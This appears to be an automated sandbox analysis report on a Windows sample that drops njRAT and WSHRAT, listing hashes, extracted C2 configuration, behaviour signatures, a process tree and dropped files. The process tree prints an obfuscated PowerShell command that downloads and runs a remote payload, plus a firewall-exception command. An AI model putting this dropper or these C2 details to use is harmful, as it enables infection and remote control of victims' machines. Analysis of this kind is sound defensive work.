Analysis

  • max time kernel
    17s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 04:07

General

  • Target

    DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe

  • Size

    451KB

  • MD5

    8eb05c68a5880d8f15fa787b02192709

  • SHA1

    45813931de14ac2f4f66d412caf9cf6fd236c5c5

  • SHA256

    df15669f7f948abd95d1a4c326aa0443f0cc534513b253accff8bd2549a3f3dc

  • SHA512

    231d122c647684386399ebe117189f1d784f89ae127fb41a061b6d43bec94c7d9cda0f13b6a4ad7f1ad233177f9df43a11c6040180653bf592ee39d3e74708b3

  • SSDEEP

    12288:BjKiWwykMpBMs3qLVmNwCIWaONK6ezkf4BBe/wKA3JIOb2:Bj5bMpf6L2wzWnW38zA3Zi

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://files.catbox.moe/hw5nal.jpg

Extracted

Family

njrat

Version

0.7d

Botnet

ofiss

C2

ofi.dyn.ydns.io:5553

Mutex

cde55e52fb830e966551ebb867b911f6

Attributes
  • reg_key

    cde55e52fb830e966551ebb867b911f6

  • splitter

    |'|'|

Extracted

Family

wshrat

C2

http://ofi.dyn.ydns.io:8000

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe
    "C:\Users\Admin\AppData\Local\Temp\DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.VBS"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1356
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
          4⤵
            PID:4432
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
              5⤵
              • Modifies Windows Firewall
              PID:1344
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js"
        2⤵
        • Drops startup file
        • Adds Run key to start application
        PID:2404
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Java.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ibNAikPWwgtnt($kyIUfjlo, $JTcfKfOUuo){[IO.File]::WriteAllBytes($kyIUfjlo, $JTcfKfOUuo)};function YczpVHAtPXfA($kyIUfjlo){if($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45137,45145,45145))) -eq $True){rundll32.exe $kyIUfjlo }elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45149,45152,45086))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $kyIUfjlo}elseif($kyIUfjlo.EndsWith((pxzGFEDn @(45083,45146,45152,45142))) -eq $True){misexec /qn /i $kyIUfjlo}else{Start-Process $kyIUfjlo}};function ngDXZIlVXFBC($BsVKuudAUmTO){$JJdfgEaJRGBrY = New-Object (pxzGFEDn @(45115,45138,45153,45083,45124,45138,45135,45104,45145,45142,45138,45147,45153));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JTcfKfOUuo = $JJdfgEaJRGBrY.DownloadData($BsVKuudAUmTO);return $JTcfKfOUuo};function pxzGFEDn($bQNW){$fVJWcyxb=45037;$oMKbCTAMoNPeFo=$Null;foreach($TerlvqdlS in $bQNW){$oMKbCTAMoNPeFo+=[char]($TerlvqdlS-$fVJWcyxb)};return $oMKbCTAMoNPeFo};function dPepQKsgLgDssQ(){$iOnAfkNBjQqBeerCG = $env:AppData + '\';$eLfUXisvXwHcf = $iOnAfkNBjQqBeerCG + 'wcqvss.com';If(Test-Path -Path $eLfUXisvXwHcf){Invoke-Item $eLfUXisvXwHcf;}Else{ $xlPtaPUVuQAAoD = ngDXZIlVXFBC (pxzGFEDn @(45141,45153,45153,45149,45152,45095,45084,45084,45139,45142,45145,45138,45152,45083,45136,45134,45153,45135,45148,45157,45083,45146,45148,45138,45084,45156,45136,45150,45155,45152,45152,45083,45136,45148,45146));ibNAikPWwgtnt $eLfUXisvXwHcf $xlPtaPUVuQAAoD;Invoke-Item $eLfUXisvXwHcf;};powershell -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123;;;;}dPepQKsgLgDssQ;
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3772
          • C:\Users\Admin\AppData\Roaming\wcqvss.com
            "C:\Users\Admin\AppData\Roaming\wcqvss.com"
            4⤵
              PID:832
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded echo 123
              4⤵
                PID:1832
          • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
            "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Certificates.jar"
            2⤵
              PID:424
            • C:\Users\Admin\AppData\Roaming\sfvip player.exe
              "C:\Users\Admin\AppData\Roaming\sfvip player.exe"
              2⤵
              • Executes dropped EXE
              PID:3396
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 3396 -s 1008
                3⤵
                • Program crash
                PID:3276
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 188 -p 3396 -ip 3396
            1⤵
              PID:1348

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\rrrrrrrr.ps1

              Filesize

              437B

              MD5

              aa9197aabec7bbbacfb4c9fbf8eb2e0d

              SHA1

              261936e557245937e069068839158a09e53c7d8b

              SHA256

              29bf616b5bffd07ed28d5d0e69c0fa30d05d45c3e3d9abf1c37f1e56def16435

              SHA512

              8e3680b1875d0ff39654c3fe2dee064b2f48973116fb7f1b056255c5547d95d29377794135c405fbd3f6da7c3f6a9629421ce2d9b09f9e4b62256f429cdbe9ed

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              1KB

              MD5

              4280e36a29fa31c01e4d8b2ba726a0d8

              SHA1

              c485c2c9ce0a99747b18d899b71dfa9a64dabe32

              SHA256

              e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

              SHA512

              494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Filesize

              53KB

              MD5

              d4d8cef58818612769a698c291ca3b37

              SHA1

              54e0a6e0c08723157829cea009ec4fe30bea5c50

              SHA256

              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

              SHA512

              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              788B

              MD5

              ca5f639e334798ffdd4690ed692f203c

              SHA1

              4229aed715a3af798d53f75e0e2c516d5329abd9

              SHA256

              a7e6ef8c446ff1abc0a5c00c308c135a5862ec9c82482c222fa3f3594ef9e134

              SHA512

              b51d905706862b18a20126f8405fbe7fcc6bbc2e6daee830564f90d8cfba718beb6d741efdfd9bea4b1493519f8a20ec589302ea37adfa6aca2a4313f9a75a79

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              18KB

              MD5

              a90a29da834a8f943919a8befce9e058

              SHA1

              a56f6afe076b6360cc6ff303b9f10b1b5425f76f

              SHA256

              64630373b17cade983e3152e9ec680b7e259a6d21aaa1435ec7812869ee39f33

              SHA512

              c8f8baf6162b8ac54ebaf377072e2881104b66f1d59f4ba0e89bc5cbda8f7a1a68152f0bb357e0551a2820f63c41eeb321dcb0cffc127d6f60a63eebf4bbef74

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ums01r5.ae1.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\Java Certificates.jar

              Filesize

              92KB

              MD5

              40ce31653e4038c1bfa3ee12c721d71d

              SHA1

              4c5057decb82f5338aab304088521a3e977786b0

              SHA256

              661c4f08bf45f798dea332d2ba1583ef232e98281350f1ffeefd5b43ae0551ec

              SHA512

              ea15a8025e7d6dc59bbfeb80b1ee8529c5c82cafddffe1954c3906d575e252c4a7e2045bf33ef7ce37c9a4f4d7ed1acc17926c13bb585b99ce3a5c9eabfe5f97

            • C:\Users\Admin\AppData\Roaming\Java.hta

              Filesize

              10KB

              MD5

              06f39cb0a617f9bba5b8bc829697dd72

              SHA1

              33cd123eee708c733de4f6e37ea78d825ab5183f

              SHA256

              53dcfe19a536f3965296b2e49fa1f936c90fa2b99b06e71cc00beedadbdfaa97

              SHA512

              9f4059679a16938a8f03b168e7931ba2514c2772a7340ba667315ebc1a3b8c24c5b3c749fc57f85bf3872c0b73b7a3a3766b9e86c367e2340865f0797e65349a

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.Certificates.Windows.js

              Filesize

              475KB

              MD5

              3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

              SHA1

              d8a147081fb7ce7561481df34aacafb2680f4bf2

              SHA256

              ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

              SHA512

              d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

            • C:\Users\Admin\AppData\Roaming\System.Certificates.Windows.js

              Filesize

              475KB

              MD5

              3d2ce2ef6ed51c9b9b9eb490f7b6f7f0

              SHA1

              d8a147081fb7ce7561481df34aacafb2680f4bf2

              SHA256

              ae3b73102a4b1317a046c39def44e36821c40d1f07b1ae7db09232c2cb3052c1

              SHA512

              d008cdacb38ba84095c9cb2e97c95534a15cb98192c070e152571afad62010c807bb451666e47e21b202d77fb26564f01773e4bbf35bcc32e99d84cb431273b5

            • C:\Users\Admin\AppData\Roaming\System.VBS

              Filesize

              984B

              MD5

              9d848c9972c6a431b81a38a9c184ea2b

              SHA1

              027939ca3d01ac4f7bde80381ba9f4dd8e1ac281

              SHA256

              6d1ca16b766a343630f954fff0e5ca159d82e55ffc197d4d2e23e71c8a61f4d3

              SHA512

              fbdbfed4a779713e0f9324b082ad9462afb03e7ba97aad1357ec3f615e757a8eec2b4700d59a6f17a3f408b0478a88e5d54e374d885db4cf4d2120784b2a7163

            • C:\Users\Admin\AppData\Roaming\sfvip player.exe

              Filesize

              802KB

              MD5

              9cd16366ca3486523fcbbda63bc8c16b

              SHA1

              6f773925b546c0e5ff76b7ef29d0671033b53cfe

              SHA256

              21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

              SHA512

              f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

            • C:\Users\Admin\AppData\Roaming\sfvip player.exe

              Filesize

              802KB

              MD5

              9cd16366ca3486523fcbbda63bc8c16b

              SHA1

              6f773925b546c0e5ff76b7ef29d0671033b53cfe

              SHA256

              21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

              SHA512

              f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

            • C:\Users\Admin\AppData\Roaming\sfvip player.exe

              Filesize

              802KB

              MD5

              9cd16366ca3486523fcbbda63bc8c16b

              SHA1

              6f773925b546c0e5ff76b7ef29d0671033b53cfe

              SHA256

              21f6f42282198dd5d031d5a6044fbac051ce73c3788b724872d4763714830415

              SHA512

              f3205eab5dd0e13126b8356950195e8c6560aecd0d1dc7fc9c2280f4ec2974cb5f1b5d846c9ec23a1ee740702aebf7b8fbeb368c838f2346f53d7a27ea35f960

            • C:\Users\Admin\AppData\Roaming\wcqvss.com

              Filesize

              22KB

              MD5

              44a163b10ef8607658aab1295a5a1e8a

              SHA1

              a498c30c4189c1e69c94a2121e72f73c7e0e727d

              SHA256

              99d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8

              SHA512

              390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991

            • C:\Users\Admin\AppData\Roaming\wcqvss.com

              Filesize

              22KB

              MD5

              44a163b10ef8607658aab1295a5a1e8a

              SHA1

              a498c30c4189c1e69c94a2121e72f73c7e0e727d

              SHA256

              99d130bf6fd7381a42190e506aa5f6db9b0503d88f0b4f80fbe8ae83576a9da8

              SHA512

              390f646e1b2a0925f49932c42f50ff963efc25bd45f692e2f0eb9fd392496289f096901db35170b0497cdcf6927636577cc9b0d0decb88423b4455a176111991

            • memory/424-286-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-291-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-329-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-285-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-299-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-300-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-177-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-219-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-273-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-248-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-264-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-306-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-261-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-258-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-257-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-255-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-254-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-251-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/424-247-0x0000000002660000-0x0000000002661000-memory.dmp

              Filesize

              4KB

            • memory/832-307-0x00000000018D0000-0x00000000018E0000-memory.dmp

              Filesize

              64KB

            • memory/1356-229-0x00000000074B0000-0x0000000007B2A000-memory.dmp

              Filesize

              6.5MB

            • memory/1356-276-0x0000000002600000-0x0000000002610000-memory.dmp

              Filesize

              64KB

            • memory/1356-172-0x0000000002600000-0x0000000002610000-memory.dmp

              Filesize

              64KB

            • memory/1356-238-0x0000000002600000-0x0000000002610000-memory.dmp

              Filesize

              64KB

            • memory/1356-178-0x0000000004E20000-0x0000000004E42000-memory.dmp

              Filesize

              136KB

            • memory/1356-181-0x0000000002600000-0x0000000002610000-memory.dmp

              Filesize

              64KB

            • memory/1356-243-0x0000000002600000-0x0000000002610000-memory.dmp

              Filesize

              64KB

            • memory/1356-176-0x0000000004F90000-0x00000000055B8000-memory.dmp

              Filesize

              6.2MB

            • memory/1356-169-0x00000000023B0000-0x00000000023E6000-memory.dmp

              Filesize

              216KB

            • memory/1356-210-0x0000000005D60000-0x0000000005D7E000-memory.dmp

              Filesize

              120KB

            • memory/1356-179-0x0000000004EC0000-0x0000000004F26000-memory.dmp

              Filesize

              408KB

            • memory/1832-312-0x0000000004F70000-0x0000000004F80000-memory.dmp

              Filesize

              64KB

            • memory/3396-159-0x000001CA505C0000-0x000001CA5068E000-memory.dmp

              Filesize

              824KB

            • memory/3396-171-0x000001CA50A10000-0x000001CA50A20000-memory.dmp

              Filesize

              64KB

            • memory/3772-236-0x0000000007520000-0x0000000007AC4000-memory.dmp

              Filesize

              5.6MB

            • memory/3772-227-0x0000000006ED0000-0x0000000006F66000-memory.dmp

              Filesize

              600KB

            • memory/3772-180-0x00000000058D0000-0x0000000005936000-memory.dmp

              Filesize

              408KB

            • memory/3772-275-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/3772-246-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/3772-244-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/3772-235-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/3772-188-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/3772-231-0x00000000064B0000-0x00000000064D2000-memory.dmp

              Filesize

              136KB

            • memory/3772-228-0x0000000006440000-0x000000000645A000-memory.dmp

              Filesize

              104KB

            • memory/3772-192-0x0000000004900000-0x0000000004910000-memory.dmp

              Filesize

              64KB

            • memory/4432-290-0x0000000002460000-0x0000000002470000-memory.dmp

              Filesize

              64KB

            • memory/4432-301-0x0000000002460000-0x0000000002470000-memory.dmp

              Filesize

              64KB

            • memory/4432-278-0x0000000000400000-0x000000000040A000-memory.dmp

              Filesize

              40KB